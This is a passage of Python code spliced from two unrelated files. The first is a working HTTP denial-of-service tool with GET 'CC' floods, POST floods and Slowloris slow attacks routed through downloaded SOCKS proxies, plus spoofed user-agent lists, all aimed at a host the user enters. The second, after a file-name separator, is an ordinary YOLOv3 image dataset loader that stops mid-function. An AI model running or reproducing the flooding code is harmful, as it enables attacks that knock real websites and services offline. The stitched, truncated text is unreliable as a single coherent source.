"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",]
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
def cc():
get_host = "GET " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
referer = "Referer: https://www.google.com/?search="+ ip + url2 + "\r\n"
request = get_host + referer + useragent + accept + connection + "\r\n"
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
n = "HTTPS"
else:
n = "CC"
s.send(str.encode(request))
print ("[*] "+n+" Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
n = "HTTPS"
else:
n = "CC"
s.send(str.encode(request))
print ("[*] "+n+" Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("[!] Connection Error")
s.close()
def post():
post_host = "POST " + url2 + " HTTP/1.1\r\nHost: "+ ip + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\n"
length = "Content-Length: 0 \r\nConnection: Keep-Alive\r\n"
refer = "Referer: http://"+ ip + url2 + "\r\n"
user_agent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
#data = str(random._urandom(16)) // You can enable bring data in HTTP Header
request = post_host + accept + refer + content + user_agent + length + "\r\n"# + data
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443': # //AUTO Enable SSL MODE :)
s = ssl.wrap_socket(s)
else:
pass
s.send(str.encode(request))
print ("[*] HTTP Post Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
else:
pass
s.send(str.encode(request))
print ("[*] HTTP Post Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("[!] Connection Error")
s.close()
def slow():
time.sleep(1)# SLow Mode
proxy = random.choice(proxies).strip().split(":")
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
else:
pass
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(random.choice(useragents)).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
print("[*] Slow attack from --> "+str(proxy[0])+":"+str(proxy[1]))
while True:
time.sleep(14)
s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
print("[*] Resent from --> "+str(proxy[0])+":"+str(proxy[1]))
except:
s.close()
print("[!] Socks Down")
slow()
def main():
global ip
global url2
global port
global proxies
global multiple
mode = str(input("> Choose Your Mode (cc/post/slow) :"))
ip = str(input("> Host/Ip:"))
if mode == "slow":
pass
else:
url = str(input("> Page you want to attack(default=/):"))
port = str(input("> Port(Https default is 443):"))
if port == '':
port = int(80)
print("> Default choose port 80\r\n> Port 80 was chosen")
else:
port = int(port)
if str(port) == '443':
print(" [!] Enable SSL Mode")
thread_num = int(input("> Threads:"))
N = str(input("> Do you need to get socks5 list?(y/n):"))
if N == 'y':
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5")
with open("socks.txt",'wb') as f:
f.write(r.content)
print("\r\n [!] Have already download socks5 list as socks.txt\r\n")
else:
pass
out_file = str(input("> Proxy file path(socks.txt):"))
if out_file == '':
out_file = str("socks.txt")
else:
out_file = str(out_file)
print ("> Number Of Proxies: %s" %(len(open(out_file).readlines())))
proxies = open(out_file).readlines()
time.sleep(0.03)
if mode == "slow":
for i in range(thread_num):
th = threading.Thread(target = slow)
th.start()
time.sleep(0.08)
else:
multiple = int(input("> Input the Magnification:"))
if url == '':
url2 = "/"
else:
url2 = str(url)
if mode == "slow":
for i in range(thread_num):
th = threading.Thread(target = slow)
th.start()
time.sleep(0.08)
elif mode == "post":
for i in range(thread_num):
th = threading.Thread(target = post)
th.start()
elif mode == "cc":
for i in range(thread_num):
th = threading.Thread(target = cc)
th.start()
else:
print("[!] Input Error")
sys.exit()
if __name__ == "__main__":
main()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416, half=False, verbose=True):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.verbose = verbose
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
self.half = half # half precision fp16 images
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in ' + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
if(self.verbose):
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
if(self.verbose):
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416, half=False):
self.img_size = img_size
self.half = half # half precision fp16 images
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416, half=False):
self.mode = 'images'
self.img_size = img_size
self.half = half # half precision fp16 images
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect, interp=cv2.INTER_LINEAR)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to 3x416x416, uint8 to float32
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32)
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, img_dir, label_dir, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_labels=False, cache_images=False, single_cls=False):
img_dir = str(Path(img_dir)) # os-agnostic
label_dir = str(Path(label_dir)) # os-agnostic
assert os.path.isdir(img_dir), 'Img Dir not found %s. See %s' % (img_dir, help_url)
assert os.path.isdir(label_dir), 'Img Dir not found %s. See %s' % (label_dir, help_url)
img_files = sorted(os.listdir(img_dir))
string = img_dir + "/"
self.img_files = [string+x for x in img_files]
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
# Define labels
label_files = sorted(os.listdir(label_dir))
string = label_dir + "/"
self.label_files = [string+x for x in label_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes (wh)
sp = path.replace('.txt', '.shapes') # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i] # wh
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32.).astype(np.int) * 32
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc='Caching labels')
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
for i, file in enumerate(pbar):
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * np.array([w, h, w, h]) # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
nf, nm, ne, nd, n)
assert nf > 0, 'No labels found. See %s' % help_url
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.label_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
hyp = self.hyp
mosaic = True and self.augment # load 4 images at a time into a mosaic (only during training)
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, img_path, shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
img_path = self.img_files[index]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r < 1 or (self.augment and (r != 1)): # always resize down, only resize up if training with augmentation
interp = cv2.INTER_LINEAR if self.augment else cv2.INTER_AREA # LINEAR for training, AREA for testing
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
x = (np.random.uniform(-1, 1, 3) * np.array([hgain, sgain, vgain]) + 1).astype(np.float32) # random gains
img_hsv = (cv2.cvtColor(img, cv2.COLOR_BGR2HSV) * x.reshape((1, 1, 3))).clip(None, 255).astype(np.uint8)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
img4 = np.zeros((s * 2, s * 2, 3), dtype=np.uint8) + 128 # base image with 4 tiles
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
